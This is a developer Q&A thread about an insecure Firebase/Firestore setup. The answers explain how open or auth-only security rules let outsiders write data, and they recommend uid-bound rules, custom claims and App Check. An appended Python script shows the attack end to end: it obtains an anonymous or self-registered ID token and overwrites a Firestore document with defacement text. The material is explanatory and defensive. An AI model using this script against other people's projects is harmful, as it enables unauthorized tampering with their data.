
I have a small web-based Flutter application that uses Firebase/Firestore. The security rules are allow read, write;

I got an anonymous email from a (friendly) hacker stating that

  • "Our Firebase database credentials are leaked in response to a request" (??)
  • "He was able to modify the database" (which he did indeed)

I understand that I have virtually no security with the given rules, but can somebody explain how a hacker can get access to the database and modify it? I guess the starting point is the network requests that can be seen in the browser's developer console, but I have no clue what's next. Can somebody outline how one can modify the Firestore database?

In an attempt to improve this, I have added anonymous authentication to my project and modified the security rules to allow read, write: if request.auth != null;
Does this make hacking attempts (a bit) less easy?

2 Answers


  1. With the allow read, write; security rules, as soon as someone has the API Key of your Firebase Project (which is public and can easily be found in the code of your app) he can read and write to your database, for example by using the Cloud Firestore API.

    Modifying your security rules to allow read, write: if request.auth != null; is not necessarily a solution: If the email/password sign-in method is enabled in your Project, one can use the Firebase Auth REST API and sign-up to your project (i.e. create a new account). Once the user is signed-in the request.auth != null expression becomes true.

    One classical approach to prevent "non-desired" users from accessing data is to add one or more Custom Claims to the desired accounts and use these claims in the Security Rules: See the doc for more details.

  2. The security rules are allow read, write;

    If you’re using these settings it means that you allow anybody who knows your project ID to read/write to/from your database. Which is obviously bad, since malicious users can take advantage of it. It’s true that you can use these settings for a small amount of time for testing purposes, but never in a production environment.

    The most important part when it comes to security rules is Firebase Authentication, meaning that you can allow access only to the users that are authenticated to perform operations in your database.

    In an attempt to improve this, I have added anonymous authentication to my project and modified the security rules to allow read, write: if request.auth != null;

    These rules are better than the previous ones. However, it will allow anybody who knows your project ID and is authenticated to read/write to/from your database. If you want a more granular set of security rules, then you can use:

    rules_version = '2';
    service cloud.firestore {
      match /databases/{database}/documents {
        match /users/{uid} {
          allow create: if request.auth != null;
          allow read, update, delete: if request.auth != null && request.auth.uid == uid;
        }
      }
    }
    

    This will allow only authenticated users to create a document, but only the user whose authentication UID matches the document ID in the database can read, update and delete it.

    Besides security rules, I also recommend you use Firebase App Check, which is an additional layer of security that can help you protect access to your Firebase services by attesting that incoming requests are coming from your app. On the other hand, it blocks the traffic that doesn't have valid credentials.

    So it’s a mix of solutions.

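The mechanism both answers describe, as an added example that is not part of either answer or of the asker's app: the Firebase config object (project ID and web API key) is shipped to every browser, so anyone can call the public REST endpoints directly. With `allow read, write;` a Firestore document can be overwritten with nothing but the project ID in the URL; with `allow read, write: if request.auth != null;` one extra call to the Firebase Auth REST API (an anonymous sign-in, or an email/password sign-up if that provider is enabled) yields an ID token that satisfies the rule. The project ID, API key, collection, document and account values below are placeholders; only `send()` touches the network, and it should be pointed at a project you own.

```python
"""Added example: writing to a Firestore project over the public REST APIs.

Two scenarios from the discussion are covered:
  1. rules 'allow read, write;'               -> no credential needed at all
  2. rules 'allow ... if request.auth != null' -> any sign-up/anonymous ID token
Project ID, API key and account values are constructed placeholders.
"""
import json
import urllib.request
from typing import Any, Dict, Optional, Tuple

AUTH_BASE = "https://identitytoolkit.googleapis.com/v1/accounts"
FIRESTORE_BASE = "https://firestore.googleapis.com/v1/projects"

# Placeholders (assumptions). In practice both come from the web app's
# Firebase config, visible in the bundle or the developer console.
PROJECT_ID = "example-project"
WEB_API_KEY = "AIza-placeholder-web-api-key"


def to_firestore_value(v: Any) -> Dict[str, Any]:
    """Encode a Python value as a Firestore REST 'Value' object."""
    if v is None:
        return {"nullValue": None}
    if isinstance(v, bool):            # check bool before int (bool subclasses int)
        return {"booleanValue": v}
    if isinstance(v, int):
        return {"integerValue": str(v)}  # int64 travels as a decimal string
    if isinstance(v, float):
        return {"doubleValue": v}
    if isinstance(v, str):
        return {"stringValue": v}
    if isinstance(v, list):
        return {"arrayValue": {"values": [to_firestore_value(x) for x in v]}}
    if isinstance(v, dict):
        return {"mapValue": {"fields": {k: to_firestore_value(x) for k, x in v.items()}}}
    raise TypeError(f"unsupported type: {type(v).__name__}")


def signup_request(api_key: str, email: Optional[str] = None,
                   password: Optional[str] = None) -> Tuple[str, Dict[str, Any]]:
    """Build the Auth REST sign-up call. Without email/password this is an
    anonymous sign-in (needs the Anonymous provider enabled); with them it
    creates a new email/password account (needs that provider enabled).
    Either way the returned idToken makes 'request.auth != null' true."""
    body: Dict[str, Any] = {"returnSecureToken": True}
    if email is not None:
        body["email"] = email
        body["password"] = password
    return f"{AUTH_BASE}:signUp?key={api_key}", body


def document_url(project_id: str, collection: str, doc_id: str = "") -> str:
    """Firestore REST path; only the project ID is needed to address data."""
    url = f"{FIRESTORE_BASE}/{project_id}/databases/(default)/documents/{collection}"
    return f"{url}/{doc_id}" if doc_id else url


def write_request(project_id: str, collection: str, doc_id: str,
                  fields: Dict[str, Any], id_token: Optional[str] = None):
    """PATCH that creates or overwrites a document. With open rules no
    Authorization header is required; with auth-only rules any ID token works."""
    headers = {"Content-Type": "application/json"}
    if id_token:
        headers["Authorization"] = f"Bearer {id_token}"
    body = {"fields": {k: to_firestore_value(v) for k, v in fields.items()}}
    return document_url(project_id, collection, doc_id), headers, body


def send(method: str, url: str, headers: Dict[str, str], body: Any = None):
    """Perform the HTTP call (the only function here that uses the network)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, headers=headers, method=method)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.loads(resp.read())


def reproduce(project_id: str, api_key: str, anonymous: bool = True):
    """Scenario 2 end to end: obtain an ID token, then overwrite a document."""
    if anonymous:
        url, body = signup_request(api_key)
    else:
        url, body = signup_request(api_key, "attacker@example.com", "Sup3r-secret!")
    token = send("POST", url, {"Content-Type": "application/json"}, body)["idToken"]
    url, headers, body = write_request(project_id, "messages", "defaced",
                                       {"text": "owned", "via": "rest"}, token)
    return send("PATCH", url, headers, body)


if __name__ == "__main__":
    # Scenario 1 shown offline: print the unauthenticated write that open rules accept.
    url, headers, body = write_request(PROJECT_ID, "messages", "defaced", {"text": "owned"})
    print("PATCH", url, headers, json.dumps(body))
    # Listing a collection needs only a GET on document_url(PROJECT_ID, "messages").
```

The same `reproduce()` flow is why the asker's second rule set only raises the bar slightly: the token it obtains carries no claim that distinguishes the attacker from a real user. Binding documents to `request.auth.uid` or to a custom claim, as the answers suggest, is what turns the token into something the rules can actually discriminate on.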